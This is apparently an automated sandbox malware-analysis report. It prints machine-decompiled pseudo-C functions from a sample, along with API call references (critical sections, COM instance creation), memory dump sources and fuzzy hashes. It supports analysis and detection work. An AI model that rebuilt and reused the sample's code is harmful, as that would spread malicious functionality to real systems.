                                                                                                                                                                                                                                                                  0x0040bb38
                                                                                                                                                                                                                                                                  0x0040bb1e
                                                                                                                                                                                                                                                                  0x0040bb1e
                                                                                                                                                                                                                                                                  0x0040bb47
                                                                                                                                                                                                                                                                  0x0040bb54
                                                                                                                                                                                                                                                                  0x0040bb5d
                                                                                                                                                                                                                                                                  0x0040bb61
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040bb72
                                                                                                                                                                                                                                                                  0x0040bb78

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0040E9A0), ref: 0040BB09
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(0040E9A4), ref: 0040BB38
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0040E9A0), ref: 0040BB47
                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(0040E9A0), ref: 0040BB54
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3102160386-0
                                                                                                                                                                                                                                                                  • Opcode ID: a2ba868ab6035a1893e2453c8998cc0da5243feb3aeb9aad8bf31b4b9c5087ae
                                                                                                                                                                                                                                                                  • Instruction ID: 372fde51beb75ce8a5f14432a71d852ad4f12131a1d584bef4942ad9e05f072d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2ba868ab6035a1893e2453c8998cc0da5243feb3aeb9aad8bf31b4b9c5087ae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A21161B4900208EBDB14DF94D984A5DB7B5FF44309F1081B9E906BB345D734EE94DB89
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040DFA0(void* __esi) {
                                                                                                                                                                                                                                                                  				intOrPtr _t13;
                                                                                                                                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                                                                                                                                  				struct _CRITICAL_SECTION* _t21;
                                                                                                                                                                                                                                                                  				void* _t22;
                                                                                                                                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                                                                                                                                  				void* _t24;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t22 = __esi;
                                                                                                                                                                                                                                                                  				_t23 =  *((intOrPtr*)(_t24 + 0xc));
                                                                                                                                                                                                                                                                  				_t21 = _t23 + 0x244;
                                                                                                                                                                                                                                                                  				EnterCriticalSection(_t21);
                                                                                                                                                                                                                                                                  				if(__esi == 0) {
                                                                                                                                                                                                                                                                  					L9:
                                                                                                                                                                                                                                                                  					LeaveCriticalSection(_t21);
                                                                                                                                                                                                                                                                  					return 1;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					if(InterlockedExchangeAdd(__esi + 0x14, 0) == 0) {
                                                                                                                                                                                                                                                                  						_t13 =  *((intOrPtr*)(__esi + 0x38));
                                                                                                                                                                                                                                                                  						_t19 =  *((intOrPtr*)(__esi + 0x34));
                                                                                                                                                                                                                                                                  						if(_t13 != 0) {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t13 + 0x34)) = _t19;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(_t19 == 0) {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t23 + 0x25c)) = _t13;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t19 + 0x38)) = _t13;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						E00408990( *((intOrPtr*)(_t22 + 0x2c)));
                                                                                                                                                                                                                                                                  						E00408990(_t22);
                                                                                                                                                                                                                                                                  						goto L9;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						LeaveCriticalSection(_t21);
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}









                                                                                                                                                                                                                                                                  0x0040dfa0
                                                                                                                                                                                                                                                                  0x0040dfa2
                                                                                                                                                                                                                                                                  0x0040dfa7
                                                                                                                                                                                                                                                                  0x0040dfb0
                                                                                                                                                                                                                                                                  0x0040dfb8
                                                                                                                                                                                                                                                                  0x0040e007
                                                                                                                                                                                                                                                                  0x0040e008
                                                                                                                                                                                                                                                                  0x0040e013
                                                                                                                                                                                                                                                                  0x0040dfba
                                                                                                                                                                                                                                                                  0x0040dfc8
                                                                                                                                                                                                                                                                  0x0040dfd9
                                                                                                                                                                                                                                                                  0x0040dfdc
                                                                                                                                                                                                                                                                  0x0040dfe1
                                                                                                                                                                                                                                                                  0x0040dfe3
                                                                                                                                                                                                                                                                  0x0040dfe3
                                                                                                                                                                                                                                                                  0x0040dfe8
                                                                                                                                                                                                                                                                  0x0040dfef
                                                                                                                                                                                                                                                                  0x0040dfea
                                                                                                                                                                                                                                                                  0x0040dfea
                                                                                                                                                                                                                                                                  0x0040dfea
                                                                                                                                                                                                                                                                  0x0040dff9
                                                                                                                                                                                                                                                                  0x0040dfff
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040dfca
                                                                                                                                                                                                                                                                  0x0040dfcd
                                                                                                                                                                                                                                                                  0x0040dfd8
                                                                                                                                                                                                                                                                  0x0040dfd8
                                                                                                                                                                                                                                                                  0x0040dfc8

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,0040E06C,?,?), ref: 0040DFB0
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DFC0
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E06C,?,?), ref: 0040DFCD
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E06C,?,?), ref: 0040E008
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2223660684-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1f96ec6c422f688b484f13e4f9c5abbc888f40617d7012874552a3011c652d57
                                                                                                                                                                                                                                                                  • Instruction ID: 10ffaa5ee4f4450ed6c24471392a2b760de4a10e81b3918d49f549c16643c8c6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f96ec6c422f688b484f13e4f9c5abbc888f40617d7012874552a3011c652d57
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B01F7756423019FC3309F66ED44AAB73A8AF85721B00543EF447E7A41DB34E409CB29
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,00406251), ref: 004058D8
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00413590), ref: 004058E3
                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00405908
                                                                                                                                                                                                                                                                    • Part of subcall function 00405640: SysFreeString.OLEAUT32(00000000), ref: 00405858
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00405902
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 459949847-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5975e5186cd30a6029e80f17e080887203ca676b882e7fd9846ae620acde5260
                                                                                                                                                                                                                                                                  • Instruction ID: 0d179a223d5d04d98ee6b13ff580c22635ce0ab0454649889296378f6cfd7aab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5975e5186cd30a6029e80f17e080887203ca676b882e7fd9846ae620acde5260
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90E09AB8900208EBC724EBA0EE0EB8E7728EB04712F1004B8F50566290DA766E48CB19
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                                                                                                                                                  			E00405640(intOrPtr _a4) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				intOrPtr* _v28;
                                                                                                                                                                                                                                                                  				void* _v32;
                                                                                                                                                                                                                                                                  				short _v36;
                                                                                                                                                                                                                                                                  				char _v40;
                                                                                                                                                                                                                                                                  				intOrPtr _t95;
                                                                                                                                                                                                                                                                  				intOrPtr _t110;
                                                                                                                                                                                                                                                                  				void* _t118;
                                                                                                                                                                                                                                                                  				void* _t199;
                                                                                                                                                                                                                                                                  				void* _t200;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					_t95 = E004055F0(0x410f58, 0x410f68);
                                                                                                                                                                                                                                                                  					_t200 = _t199 + 8;
                                                                                                                                                                                                                                                                  					_v28 = _t95;
                                                                                                                                                                                                                                                                  					if(_v28 == 0) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_push( &_v32);
                                                                                                                                                                                                                                                                  					_push(_v28);
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() == 0) {
                                                                                                                                                                                                                                                                  						_push( &_v16);
                                                                                                                                                                                                                                                                  						_push(_v32);
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x1c))))() == 0) {
                                                                                                                                                                                                                                                                  							_push( &_v36);
                                                                                                                                                                                                                                                                  							_push(_v16);
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x20))))() == 0) {
                                                                                                                                                                                                                                                                  								if(_v36 == 0xffffffff) {
                                                                                                                                                                                                                                                                  									_push( &_v12);
                                                                                                                                                                                                                                                                  									_push(_v16);
                                                                                                                                                                                                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x50))))() == 0) {
                                                                                                                                                                                                                                                                  										_push( &_v24);
                                                                                                                                                                                                                                                                  										_push(_a4);
                                                                                                                                                                                                                                                                  										_push(_v12);
                                                                                                                                                                                                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x28))))() != 0) {
                                                                                                                                                                                                                                                                  											_t110 = E004055F0(0x410f78, 0x410f88);
                                                                                                                                                                                                                                                                  											_t199 = _t200 + 8;
                                                                                                                                                                                                                                                                  											_v24 = _t110;
                                                                                                                                                                                                                                                                  											if(_v24 != 0) {
                                                                                                                                                                                                                                                                  												__imp__#2(L"Microsoft Corporation");
                                                                                                                                                                                                                                                                  												_v8 = _t110;
                                                                                                                                                                                                                                                                  												if(_v8 != 0) {
                                                                                                                                                                                                                                                                  													_push(_v8);
                                                                                                                                                                                                                                                                  													_push(_v24);
                                                                                                                                                                                                                                                                  													if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x20))))() == 0) {
                                                                                                                                                                                                                                                                  														_push(_a4);
                                                                                                                                                                                                                                                                  														_push(_v24);
                                                                                                                                                                                                                                                                  														if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x28))))() == 0) {
                                                                                                                                                                                                                                                                  															_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                  															if(_t118 == 0) {
                                                                                                                                                                                                                                                                  																 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x20))))(_v12, _v24);
                                                                                                                                                                                                                                                                  																_t118 = 0;
                                                                                                                                                                                                                                                                  																if(0 != 0) {
                                                                                                                                                                                                                                                                  																	continue;
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																L34:
                                                                                                                                                                                                                                                                  																if(_v20 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 = E00408990(_v20);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v8 != 0) {
                                                                                                                                                                                                                                                                  																	__imp__#6(_v8);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v24 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v12 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v16 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v32 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 8))))(_v32);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v28 == 0) {
                                                                                                                                                                                                                                                                  																	return _t118;
                                                                                                                                                                                                                                                                  																} else {
                                                                                                                                                                                                                                                                  																	return  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  															}
                                                                                                                                                                                                                                                                  															goto L34;
                                                                                                                                                                                                                                                                  														}
                                                                                                                                                                                                                                                                  														goto L34;
                                                                                                                                                                                                                                                                  													}
                                                                                                                                                                                                                                                                  													goto L34;
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  												goto L34;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											goto L34;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x44))))(_v24,  &_v36);
                                                                                                                                                                                                                                                                  										if(_t118 == 0) {
                                                                                                                                                                                                                                                                  											if(_v36 != 0xffffffff) {
                                                                                                                                                                                                                                                                  												 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x48))))(_v24, 0xffffffff);
                                                                                                                                                                                                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												_v40 = 0;
                                                                                                                                                                                                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x34))))(_v24,  &_v40);
                                                                                                                                                                                                                                                                  												if(_t118 == 0 && _v40 != 0) {
                                                                                                                                                                                                                                                                  													_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L34;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									goto L34;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L34;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L34;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L34;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					goto L34;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				goto L34;
                                                                                                                                                                                                                                                                  			}

















                                                                                                                                                                                                                                                                  0x00405646
                                                                                                                                                                                                                                                                  0x0040564d
                                                                                                                                                                                                                                                                  0x00405654
                                                                                                                                                                                                                                                                  0x0040565b
                                                                                                                                                                                                                                                                  0x00405662
                                                                                                                                                                                                                                                                  0x00405669
                                                                                                                                                                                                                                                                  0x00405670
                                                                                                                                                                                                                                                                  0x00405677
                                                                                                                                                                                                                                                                  0x00405681
                                                                                                                                                                                                                                                                  0x00405686
                                                                                                                                                                                                                                                                  0x00405689
                                                                                                                                                                                                                                                                  0x00405690
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040569a
                                                                                                                                                                                                                                                                  0x004056a3
                                                                                                                                                                                                                                                                  0x004056ab
                                                                                                                                                                                                                                                                  0x004056b5
                                                                                                                                                                                                                                                                  0x004056be
                                                                                                                                                                                                                                                                  0x004056c6
                                                                                                                                                                                                                                                                  0x004056d0
                                                                                                                                                                                                                                                                  0x004056d9
                                                                                                                                                                                                                                                                  0x004056e1
                                                                                                                                                                                                                                                                  0x004056ef
                                                                                                                                                                                                                                                                  0x004056f9
                                                                                                                                                                                                                                                                  0x00405702
                                                                                                                                                                                                                                                                  0x0040570a
                                                                                                                                                                                                                                                                  0x00405714
                                                                                                                                                                                                                                                                  0x00405718
                                                                                                                                                                                                                                                                  0x00405721
                                                                                                                                                                                                                                                                  0x00405729
                                                                                                                                                                                                                                                                  0x004057b3
                                                                                                                                                                                                                                                                  0x004057b8
                                                                                                                                                                                                                                                                  0x004057bb
                                                                                                                                                                                                                                                                  0x004057c2
                                                                                                                                                                                                                                                                  0x004057cb
                                                                                                                                                                                                                                                                  0x004057d1
                                                                                                                                                                                                                                                                  0x004057d8
                                                                                                                                                                                                                                                                  0x004057df
                                                                                                                                                                                                                                                                  0x004057e8
                                                                                                                                                                                                                                                                  0x004057f0
                                                                                                                                                                                                                                                                  0x004057f7
                                                                                                                                                                                                                                                                  0x00405800
                                                                                                                                                                                                                                                                  0x00405808
                                                                                                                                                                                                                                                                  0x0040581a
                                                                                                                                                                                                                                                                  0x0040581e
                                                                                                                                                                                                                                                                  0x00405832
                                                                                                                                                                                                                                                                  0x00405834
                                                                                                                                                                                                                                                                  0x00405836
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040583c
                                                                                                                                                                                                                                                                  0x00405840
                                                                                                                                                                                                                                                                  0x00405846
                                                                                                                                                                                                                                                                  0x0040584b
                                                                                                                                                                                                                                                                  0x00405852
                                                                                                                                                                                                                                                                  0x00405858
                                                                                                                                                                                                                                                                  0x00405858
                                                                                                                                                                                                                                                                  0x00405862
                                                                                                                                                                                                                                                                  0x00405870
                                                                                                                                                                                                                                                                  0x00405870
                                                                                                                                                                                                                                                                  0x00405876
                                                                                                                                                                                                                                                                  0x00405884
                                                                                                                                                                                                                                                                  0x00405884
                                                                                                                                                                                                                                                                  0x0040588a
                                                                                                                                                                                                                                                                  0x00405898
                                                                                                                                                                                                                                                                  0x00405898
                                                                                                                                                                                                                                                                  0x0040589e
                                                                                                                                                                                                                                                                  0x004058ac
                                                                                                                                                                                                                                                                  0x004058ac
                                                                                                                                                                                                                                                                  0x004058b2
                                                                                                                                                                                                                                                                  0x004058c5
                                                                                                                                                                                                                                                                  0x004058b4
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004058c0
                                                                                                                                                                                                                                                                  0x004058b2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405820
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040580a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004057f2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004057da
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004057c4
                                                                                                                                                                                                                                                                  0x0040573b
                                                                                                                                                                                                                                                                  0x0040573f
                                                                                                                                                                                                                                                                  0x0040574d
                                                                                                                                                                                                                                                                  0x00405792
                                                                                                                                                                                                                                                                  0x004057a2
                                                                                                                                                                                                                                                                  0x0040574f
                                                                                                                                                                                                                                                                  0x0040574f
                                                                                                                                                                                                                                                                  0x00405766
                                                                                                                                                                                                                                                                  0x0040576a
                                                                                                                                                                                                                                                                  0x00405780
                                                                                                                                                                                                                                                                  0x00405780
                                                                                                                                                                                                                                                                  0x00405782
                                                                                                                                                                                                                                                                  0x004057a4
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040573f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040570c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004056f1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004056e3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004056c8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004056ad
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004055F0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00405610
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00405858
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateFreeInstanceString
                                                                                                                                                                                                                                                                  • String ID: Microsoft Corporation
                                                                                                                                                                                                                                                                  • API String ID: 586785272-3838278685
                                                                                                                                                                                                                                                                  • Opcode ID: c7453d52693bc7b60de16940a77df03e7104cdf20df7428d156c1474af7c1dc8
                                                                                                                                                                                                                                                                  • Instruction ID: 63bbab498f99db53ba01a8136a03793a8b602ba9dec1d09a194da87260503e76
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7453d52693bc7b60de16940a77df03e7104cdf20df7428d156c1474af7c1dc8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4391FB75A0050ADFCB04DB98C994AAFB7B5EF88300F208169E515B73A0D739AE42CF65
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 66%
                                                                                                                                                                                                                                                                  			E0040C950(char* _a4) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				char _v16;
                                                                                                                                                                                                                                                                  				intOrPtr* _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				void* _v28;
                                                                                                                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                                                                                                                  				intOrPtr _t44;
                                                                                                                                                                                                                                                                  				intOrPtr* _t46;
                                                                                                                                                                                                                                                                  				intOrPtr _t59;
                                                                                                                                                                                                                                                                  				intOrPtr _t62;
                                                                                                                                                                                                                                                                  				void* _t88;
                                                                                                                                                                                                                                                                  				void* _t89;
                                                                                                                                                                                                                                                                  				void* _t90;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                                                                                                                  				_t44 = E0040BF80(_a4,  &_v8);
                                                                                                                                                                                                                                                                  				_t89 = _t88 + 8;
                                                                                                                                                                                                                                                                  				_v12 = _t44;
                                                                                                                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                                                                                                                  					_t46 = E0040BD20(_v12);
                                                                                                                                                                                                                                                                  					_t90 = _t89 + 4;
                                                                                                                                                                                                                                                                  					_v20 = _t46;
                                                                                                                                                                                                                                                                  					if(_v20 != 0) {
                                                                                                                                                                                                                                                                  						_v24 = 0;
                                                                                                                                                                                                                                                                  						_push( &_v24);
                                                                                                                                                                                                                                                                  						_push(_v20);
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xb4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                  							_v28 = 0;
                                                                                                                                                                                                                                                                  							_push( &_v28);
                                                                                                                                                                                                                                                                  							_push(_v24);
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x30))))() == 0 && _v28 != 0) {
                                                                                                                                                                                                                                                                  								_t59 = E0040C900(_v28);
                                                                                                                                                                                                                                                                  								_t90 = _t90 + 4;
                                                                                                                                                                                                                                                                  								_v32 = _t59;
                                                                                                                                                                                                                                                                  								if(_v32 != 0) {
                                                                                                                                                                                                                                                                  									_t62 = E0040C7E0(_v28);
                                                                                                                                                                                                                                                                  									_t90 = _t90 + 4;
                                                                                                                                                                                                                                                                  									_v36 = _t62;
                                                                                                                                                                                                                                                                  									if(_v36 != 0) {
                                                                                                                                                                                                                                                                  										E0040B100( &_v16, "%S%S", _v32);
                                                                                                                                                                                                                                                                  										_t90 = _t90 + 0x10;
                                                                                                                                                                                                                                                                  										__imp__#6(_v36, _v36);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__imp__#6(_v32);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                                                                                                                                                                                                  						}
